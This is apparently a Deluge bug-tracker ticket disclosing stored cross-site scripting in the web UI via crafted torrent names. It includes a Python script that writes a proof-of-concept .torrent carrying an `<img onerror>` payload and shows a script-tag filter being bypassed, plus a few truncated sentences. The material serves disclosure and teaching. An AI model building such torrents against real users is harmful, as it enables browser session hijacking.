As the data from torrent files is not properly sanitised it's interpreted
directly as HTML. As such someone who supplies the user with a malicious
browser session. It should be noted that the Tornado webserver is not
configured to send any `Content-Security-Policy` headers which can help to
mitigate some of the impact. Due to this omission, the attacker can
download/upload arbitrary data from/to remote endpoints.
It should be noted there is some basic filtering such that a `<script>`
doesn't work, but this can be trivially bypassed by using a construct such
as `<img src="#" onerror=` or just a hidden, remote iframe which loads the
This script creates a PoC torrent to demonstrate the vulnerability:
the attached screenshot is taken after uploading a .torrent file generated
by that script.
Additionally there are several HTML injection bugs, for example in the
''Connection Manager'', but these are merely bugs as the local user
injects the payload as opposed to a remote attacker who uploads a
malicious torrent to a public search engine.
* Attachment "deluge xss.png" added.
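Added illustration of the injection vector described above (this is not the reporter's PoC script, which is not reproduced in the ticket, and not Deluge's own code): a minimal bencode writer builds a .torrent whose `info.name` carries the `<img src="#" onerror=...>` payload, and two renderers show why stripping `<script>` is not enough. The assumptions are that the injected field is the torrent name and that the "basic filtering" behaves like a tag-stripping regex; both are placeholders for the real Deluge behaviour, which the ticket does not spell out.

```python
import hashlib
import html
import re

# --- minimal bencode encoder, enough to write a structurally valid .torrent ---
def bencode(obj):
    if isinstance(obj, bool):
        raise TypeError("bool is not a bencode type")
    if isinstance(obj, int):
        return b"i%de" % obj
    if isinstance(obj, str):
        obj = obj.encode("utf-8")
    if isinstance(obj, bytes):
        return b"%d:" % len(obj) + obj
    if isinstance(obj, list):
        return b"l" + b"".join(bencode(x) for x in obj) + b"e"
    if isinstance(obj, dict):
        # bencode requires byte-string keys in sorted order
        norm = {(k.encode("utf-8") if isinstance(k, str) else k): v for k, v in obj.items()}
        body = b"".join(bencode(k) + bencode(norm[k]) for k in sorted(norm))
        return b"d" + body + b"e"
    raise TypeError("cannot bencode %r" % type(obj))

# The bypass construct quoted in the ticket (constructed sample payload).
PAYLOAD = '<img src="#" onerror="alert(document.domain)">'

def build_poc_torrent(name=PAYLOAD, piece_length=16384, content=b"A" * 16384):
    """Build a single-file torrent whose name field carries the HTML payload.

    Assumption: the web UI renders info.name unescaped; the ticket does not
    name the exact field, so this is illustrative only.
    """
    pieces = b"".join(
        hashlib.sha1(content[i:i + piece_length]).digest()
        for i in range(0, len(content), piece_length)
    )
    info = {
        "name": name,
        "piece length": piece_length,
        "length": len(content),
        "pieces": pieces,
    }
    return bencode({"announce": "http://tracker.invalid/announce", "info": info})

def naive_filter(s):
    """Hypothetical stand-in for 'basic filtering' that only drops <script> tags."""
    return re.sub(r"<\s*/?\s*script[^>]*>", "", s, flags=re.I)

def safe_render(s):
    """Context-correct fix: escape everything HTML-significant, including quotes."""
    return html.escape(s, quote=True)

def render_name(name, sanitizer):
    """Simulate dropping an attacker-controlled name into an HTML table cell."""
    return "<td>" + sanitizer(name) + "</td>"

if __name__ == "__main__":
    with open("poc.torrent", "wb") as fh:
        fh.write(build_poc_torrent())
    print("naive :", render_name(PAYLOAD, naive_filter))
    print("escaped:", render_name(PAYLOAD, safe_render))
```

Running the script writes `poc.torrent` and prints the two renderings: the tag-stripping filter leaves the `<img ... onerror=...>` element intact and executable, while `html.escape` turns every `<`, `>` and `"` into an entity so the browser shows the name as text.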
Comment (by jasperla):
Please close this ticket, it's a duplicate of #3459.
Ticket URL: <https://dev.deluge-torrent.org/ticket/3460#comment:1>